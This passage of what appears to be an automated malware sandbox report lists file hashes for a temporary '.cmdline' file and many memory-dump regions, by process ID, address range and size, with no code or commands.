                                                                    8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                    SHA512

                                                                    22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\wa3vpgzd\wa3vpgzd.cmdline
                                                                    Filesize

                                                                    607B

                                                                    MD5

                                                                    5356b48fccd666907cddaf623879f8cb

                                                                    SHA1

                                                                    2facb86dc936e6e41695ad34c1aff6ef12ac7a16

                                                                    SHA256

                                                                    ae80e1457a69e385895cc317f9d72ba3055600abdd7aa4b5f88c52f8e865f5c3

                                                                    SHA512

                                                                    40ab99ba7ab890ca5808dce2d26e97985e68c9c7fb8a9c9f19ea2bfa036a77a6e0ce57571d799788e9ba880c40d7775c2d0387b27b0cd7c35abb76fb579c74b2

                                                                  • memory/760-127-0x0000000006020000-0x0000000006086000-memory.dmp
                                                                    Filesize

                                                                    408KB

                                                                  • memory/760-49-0x0000000003140000-0x0000000003150000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/760-121-0x0000000005FB0000-0x0000000006016000-memory.dmp
                                                                    Filesize

                                                                    408KB

                                                                  • memory/760-228-0x0000000006600000-0x000000000661E000-memory.dmp
                                                                    Filesize

                                                                    120KB

                                                                  • memory/760-26-0x0000000005810000-0x0000000005E38000-memory.dmp
                                                                    Filesize

                                                                    6.2MB

                                                                  • memory/760-52-0x0000000003140000-0x0000000003150000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/760-188-0x0000000003140000-0x0000000003150000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/760-231-0x00000000066E0000-0x000000000672C000-memory.dmp
                                                                    Filesize

                                                                    304KB

                                                                  • memory/760-185-0x0000000003140000-0x0000000003150000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/760-183-0x0000000073540000-0x0000000073CF0000-memory.dmp
                                                                    Filesize

                                                                    7.7MB

                                                                  • memory/760-140-0x0000000006190000-0x00000000064E4000-memory.dmp
                                                                    Filesize

                                                                    3.3MB

                                                                  • memory/760-36-0x0000000073540000-0x0000000073CF0000-memory.dmp
                                                                    Filesize

                                                                    7.7MB

                                                                  • memory/760-117-0x0000000005790000-0x00000000057B2000-memory.dmp
                                                                    Filesize

                                                                    136KB

                                                                  • memory/760-16-0x0000000003080000-0x00000000030B6000-memory.dmp
                                                                    Filesize

                                                                    216KB

                                                                  • memory/1324-182-0x0000000073540000-0x0000000073CF0000-memory.dmp
                                                                    Filesize

                                                                    7.7MB

                                                                  • memory/1324-193-0x00000000053F0000-0x0000000005400000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/1324-15-0x0000000000B40000-0x0000000000B50000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/1324-17-0x0000000073540000-0x0000000073CF0000-memory.dmp
                                                                    Filesize

                                                                    7.7MB

                                                                  • memory/1324-25-0x0000000005A70000-0x0000000006014000-memory.dmp
                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/1324-51-0x0000000005410000-0x00000000054A2000-memory.dmp
                                                                    Filesize

                                                                    584KB

                                                                  • memory/1324-111-0x00000000055C0000-0x00000000055CA000-memory.dmp
                                                                    Filesize

                                                                    40KB

                                                                  • memory/1324-112-0x00000000053F0000-0x0000000005400000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/1324-116-0x0000000005630000-0x0000000005688000-memory.dmp
                                                                    Filesize

                                                                    352KB

                                                                  • memory/1324-233-0x00000000053F0000-0x0000000005400000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/1544-241-0x000001C02F7A0000-0x000001C02F7B0000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/1544-237-0x000001C02F7A0000-0x000001C02F7B0000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/1544-236-0x000001C02F7A0000-0x000001C02F7B0000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/1544-200-0x000001C02F920000-0x000001C02F942000-memory.dmp
                                                                    Filesize

                                                                    136KB

                                                                  • memory/1544-203-0x00007FFC05710000-0x00007FFC061D1000-memory.dmp
                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/2000-240-0x0000025FB7DD0000-0x0000025FB7DE0000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/2000-239-0x0000025FB7DD0000-0x0000025FB7DE0000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/2000-238-0x00007FFC05710000-0x00007FFC061D1000-memory.dmp
                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/2000-338-0x0000025FB7DD0000-0x0000025FB7DE0000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/2628-347-0x0000019EFCE80000-0x0000019EFCE90000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/2628-346-0x00007FFC05710000-0x00007FFC061D1000-memory.dmp
                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/3404-211-0x00007FFC05710000-0x00007FFC061D1000-memory.dmp
                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/3404-235-0x00000182FD730000-0x00000182FD740000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/3404-234-0x00000182FD730000-0x00000182FD740000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/3480-214-0x00007FFC01EE0000-0x00007FFC024C9000-memory.dmp
                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3480-138-0x00007FFC15FB0000-0x00007FFC15FD3000-memory.dmp
                                                                    Filesize

                                                                    140KB

                                                                  • memory/3480-226-0x00007FFC01B30000-0x00007FFC01BE8000-memory.dmp
                                                                    Filesize

                                                                    736KB

                                                                  • memory/3480-227-0x00007FFC017B0000-0x00007FFC01B28000-memory.dmp
                                                                    Filesize

                                                                    3.5MB

                                                                  • memory/3480-158-0x00007FFC15740000-0x00007FFC15759000-memory.dmp
                                                                    Filesize

                                                                    100KB

                                                                  • memory/3480-163-0x00007FFC01BF0000-0x00007FFC01D67000-memory.dmp
                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/3480-225-0x00007FFC15570000-0x00007FFC1559E000-memory.dmp
                                                                    Filesize

                                                                    184KB

                                                                  • memory/3480-223-0x00007FFC15720000-0x00007FFC15739000-memory.dmp
                                                                    Filesize

                                                                    100KB

                                                                  • memory/3480-221-0x00007FFC15620000-0x00007FFC15643000-memory.dmp
                                                                    Filesize

                                                                    140KB

                                                                  • memory/3480-178-0x000002A661120000-0x000002A661498000-memory.dmp
                                                                    Filesize

                                                                    3.5MB

                                                                  • memory/3480-215-0x00007FFC15FB0000-0x00007FFC15FD3000-memory.dmp
                                                                    Filesize

                                                                    140KB

                                                                  • memory/3480-242-0x00007FFC01EE0000-0x00007FFC024C9000-memory.dmp
                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3480-248-0x00007FFC01EE0000-0x00007FFC024C9000-memory.dmp
                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3480-159-0x00007FFC15620000-0x00007FFC15643000-memory.dmp
                                                                    Filesize

                                                                    140KB

                                                                  • memory/3480-177-0x00007FFC017B0000-0x00007FFC01B28000-memory.dmp
                                                                    Filesize

                                                                    3.5MB

                                                                  • memory/3480-176-0x00007FFC01B30000-0x00007FFC01BE8000-memory.dmp
                                                                    Filesize

                                                                    736KB

                                                                  • memory/3480-184-0x00007FFC15600000-0x00007FFC15614000-memory.dmp
                                                                    Filesize

                                                                    80KB

                                                                  • memory/3480-322-0x00007FFC01EE0000-0x00007FFC024C9000-memory.dmp
                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3480-323-0x00007FFC15FB0000-0x00007FFC15FD3000-memory.dmp
                                                                    Filesize

                                                                    140KB

                                                                  • memory/3480-328-0x00007FFC01BF0000-0x00007FFC01D67000-memory.dmp
                                                                    Filesize

                                                                    1.5MB

                                                                  • memory/3480-175-0x00007FFC15570000-0x00007FFC1559E000-memory.dmp
                                                                    Filesize

                                                                    184KB

                                                                  • memory/3480-435-0x00007FFC01EE0000-0x00007FFC024C9000-memory.dmp
                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3480-132-0x00007FFC01EE0000-0x00007FFC024C9000-memory.dmp
                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3480-189-0x00007FFC161C0000-0x00007FFC161CD000-memory.dmp
                                                                    Filesize

                                                                    52KB

                                                                  • memory/3480-171-0x00007FFC15720000-0x00007FFC15739000-memory.dmp
                                                                    Filesize

                                                                    100KB

                                                                  • memory/3480-157-0x00007FFC15E40000-0x00007FFC15E6D000-memory.dmp
                                                                    Filesize

                                                                    180KB

                                                                  • memory/3480-359-0x00007FFC01EE0000-0x00007FFC024C9000-memory.dmp
                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3480-147-0x00007FFC01EE0000-0x00007FFC024C9000-memory.dmp
                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3480-232-0x00007FFC015E0000-0x00007FFC016FC000-memory.dmp
                                                                    Filesize

                                                                    1.1MB

                                                                  • memory/3480-173-0x00007FFC161E0000-0x00007FFC161ED000-memory.dmp
                                                                    Filesize

                                                                    52KB

                                                                  • memory/3480-141-0x00007FFC17070000-0x00007FFC1707F000-memory.dmp
                                                                    Filesize

                                                                    60KB

                                                                  • memory/4408-288-0x00007FFC05710000-0x00007FFC061D1000-memory.dmp
                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/4408-286-0x00000273FE6B0000-0x00000273FE6C0000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/4408-285-0x00000273FE6B0000-0x00000273FE6C0000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/4952-110-0x00007FFC05710000-0x00007FFC061D1000-memory.dmp
                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/4952-339-0x000000001B560000-0x000000001B570000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/4952-186-0x00007FFC05710000-0x00007FFC061D1000-memory.dmp
                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/4952-166-0x000000001B560000-0x000000001B570000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/4952-97-0x0000000000880000-0x000000000089A000-memory.dmp
                                                                    Filesize

                                                                    104KB

                                                                  • memory/5248-337-0x0000023631FB0000-0x0000023631FC0000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/5248-287-0x00007FFC05710000-0x00007FFC061D1000-memory.dmp
                                                                    Filesize

                                                                    10.8MB